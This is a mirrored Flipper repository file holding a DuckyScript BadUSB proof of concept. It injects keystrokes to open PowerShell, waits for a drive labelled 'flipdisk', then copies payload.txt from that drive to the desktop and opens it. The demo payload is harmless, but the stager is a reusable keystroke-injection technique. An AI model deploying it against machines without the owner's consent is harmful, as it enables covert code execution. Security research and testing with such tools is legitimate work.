mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2025-01-04 21:00:14 +00:00
32 lines
1.6 KiB
Plaintext
32 lines
1.6 KiB
Plaintext
REM Author: emptythevoid
|
|
REM Uses Powershell based on GlennChambers https://forum.macrium.com/332/Powershell-script-to-detect-a-certain-drive-that-is-mounted-then-perfrom-backup
|
|
REM Target: Windows 10, 11
|
|
REM Category: PoC
|
|
|
|
REM example code to demonstrate BadUSB powershell waiting for Flipper disk image to mount after execution
|
|
REM Powershell will wait until a device with the specified drive label is found.
|
|
REM When drive label is mounted, Powershell will copy a payload.txt from the disk image to current user's desktop and open it.
|
|
REM disk image in Flipper must have the drive label: flipdisk
|
|
|
|
REM Open Powershell
|
|
DELAY 500
|
|
GUI r
|
|
DELAY 500
|
|
|
|
STRING powershell
|
|
|
|
DELAY 500
|
|
ENTER
|
|
DELAY 750
|
|
|
|
REM $d is the powershell command to run once the flipper disk image is found
|
|
STRING $d={$Desktoppath=[environment]::getfolderpath("desktop"); cp $driveLetter\payload.txt $desktoppath\payload.txt;invoke-item $desktoppath\payload.txt;};
|
|
|
|
REM below is the powershell stager to look for a disk label called 'flipdisk'.
|
|
REM Powershell will remain open and wait until it sees the disk mount.
|
|
REM Once disk is found, command $d from above is executed.
|
|
STRING Register-WmiEvent -Class win32_VolumeChangeEvent -SourceIdentifier volumeChange;do{$newEvent = Wait-Event -SourceIdentifier volumeChange;$eventType = $newEvent.SourceEventArgs.NewEvent.EventType;if ($eventType -eq 2){$driveLetter = $newEvent.SourceEventArgs.NewEvent.DriveName;$driveLabel = ([wmi]"Win32_LogicalDisk='$driveLetter'").VolumeName;if ($driveLabel -eq 'flipdisk'){start-sleep -seconds 1;& $d;exit;}};Remove-Event -SourceIdentifier volumeChange;} while (1-eq1);Unregister-Event -SourceIdentifier volumeChange
|
|
|
|
ENTER
|
|
|